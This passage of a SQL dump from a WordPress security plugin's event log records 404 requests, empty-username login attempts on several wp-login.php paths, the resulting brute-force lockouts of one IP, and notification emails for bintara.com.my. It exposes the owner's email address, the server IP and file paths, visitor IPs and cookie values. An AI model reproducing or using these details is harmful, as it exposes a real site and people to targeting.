"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYcBVm3w2nrGTPdYNRv@xAAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569128790.9124\";s:12:\"REQUEST_TIME\";s:10:\"1569128790\";}}','notice','2019-09-22 05:06:32','2019-09-22 05:06:31',30747616,32553472,'https://bintara.com.my/service-title-5/',1,0,'216.244.66.228'),(26798,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"177.73.188.80\";s:11:\"REMOTE_PORT\";s:5:\"39948\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYcNZG3w2nrGTPdYNRsHCAAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569131876.181\";s:12:\"REQUEST_TIME\";s:10:\"1569131876\";}}','notice','2019-09-22 05:57:59','2019-09-22 05:57:56',31196584,33014600,'https://bintara.com.my/?page_id=18',1,0,'177.73.188.80'),(26799,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=b1885dd2a7c5aa2b0d9d6cf882d94135\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYcZTeHT9TtrAHgWcH24ewAAAAU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"117.53.152.104\";s:11:\"REMOTE_PORT\";s:5:\"60093\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYcZTeHT9TtrAHgWcH24ewAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569134925.882\";s:12:\"REQUEST_TIME\";s:10:\"1569134925\";}}','notice','2019-09-22 06:48:47','2019-09-22 06:48:46',31162096,32689208,'https://bintara.com.my/blog/wp-login.php',1,0,'117.53.152.104'),(26800,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 14:48:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 06:48:46\";s:14:\"lockout_expire\";s:19:\"2019-09-26 18:48:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 10:48:46\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-22 06:48:47','2019-09-22 06:48:46',31243584,32689208,'https://bintara.com.my/blog/wp-login.php',1,0,'117.53.152.104'),(26801,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-22 06:48:47','2019-09-22 06:48:46',31866944,32689208,'https://bintara.com.my/blog/wp-login.php',1,0,'117.53.152.104'),(26802,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYcccDkYtOEVzsOgB0LVNAAAAJc\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.106.242\";s:11:\"REMOTE_PORT\";s:5:\"65415\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYcccDkYtOEVzsOgB0LVNAAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569135728.6134\";s:12:\"REQUEST_TIME\";s:10:\"1569135728\";}}','notice','2019-09-22 07:02:11','2019-09-22 07:02:08',31146224,32955568,'https://bintara.com.my/our-history/about1/',1,0,'27.102.106.242'),(26803,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/2F3EA5A0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"189.84.121.34\";s:11:\"REMOTE_PORT\";s:5:\"55491\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYcfwuHT9TtrAHgWcH28BwAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569136579.0111\";s:12:\"REQUEST_TIME\";s:10:\"1569136579\";}}','notice','2019-09-22 07:16:20','2019-09-22 07:16:19',30804608,32617656,'https://bintara.com.my/?page_id=18',1,0,'189.84.121.34'),(26804,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=c9c57a9343eba4fff0ac15b3fece95ba\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYck4YRu5Nugk8c4xdXJ-QAAANY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"117.53.152.104\";s:11:\"REMOTE_PORT\";s:5:\"48723\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYck4YRu5Nugk8c4xdXJ-QAAANY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569137889.6042\";s:12:\"REQUEST_TIME\";s:10:\"1569137889\";}}','notice','2019-09-22 07:38:11','2019-09-22 07:38:09',31159152,32689424,'https://bintara.com.my/wp/wp-login.php',1,0,'117.53.152.104'),(26805,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 15:38:09\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 07:38:09\";s:14:\"lockout_expire\";s:19:\"2019-09-26 19:38:09\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 11:38:09\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-22 07:38:11','2019-09-22 07:38:09',31240552,32689424,'https://bintara.com.my/wp/wp-login.php',1,0,'117.53.152.104'),(26806,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-22 07:38:11','2019-09-22 07:38:09',31863928,32689424,'https://bintara.com.my/wp/wp-login.php',1,0,'117.53.152.104'),(26807,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=228d9769d1cfe71ddcc836e17ac69908\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYc1GeHT9TtrAHgWcH3ImQAAAAI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"117.53.152.104\";s:11:\"REMOTE_PORT\";s:5:\"57986\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYc1GeHT9TtrAHgWcH3ImQAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569142041.7019\";s:12:\"REQUEST_TIME\";s:10:\"1569142041\";}}','notice','2019-09-22 08:47:23','2019-09-22 08:47:22',31158816,32698616,'https://bintara.com.my/wordpress/wp-login.php',1,0,'117.53.152.104'),(26808,0,'lockout','host-lockout::117.53.152.104','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"117.53.152.104\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 16:47:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 08:47:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 20:47:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 12:47:22\";s:12:\"lockout_host\";s:14:\"117.53.152.104\";}','action','2019-09-22 08:47:23','2019-09-22 08:47:22',31241112,32698616,'https://bintara.com.my/wordpress/wp-login.php',1,0,'117.53.152.104'),(26809,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"117.53.152.104\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 16:47:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 08:47:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 20:47:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 12:47:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-22 08:47:23','2019-09-22 08:47:22',31241088,32698616,'https://bintara.com.my/wordpress/wp-login.php',1,0,'117.53.152.104'),(26810,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-22 08:47:23','2019-09-22 08:47:22',31865384,32698616,'https://bintara.com.my/wordpress/wp-login.php',1,0,'117.53.152.104'),(26811,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"87.197.137.223\";s:11:\"REMOTE_PORT\";s:5:\"40449\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYdE6eHT9TtrAHgWcH3SqgAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569146089.9331\";s:12:\"REQUEST_TIME\";s:10:\"1569146089\";}}','notice','2019-09-22 09:54:52','2019-09-22 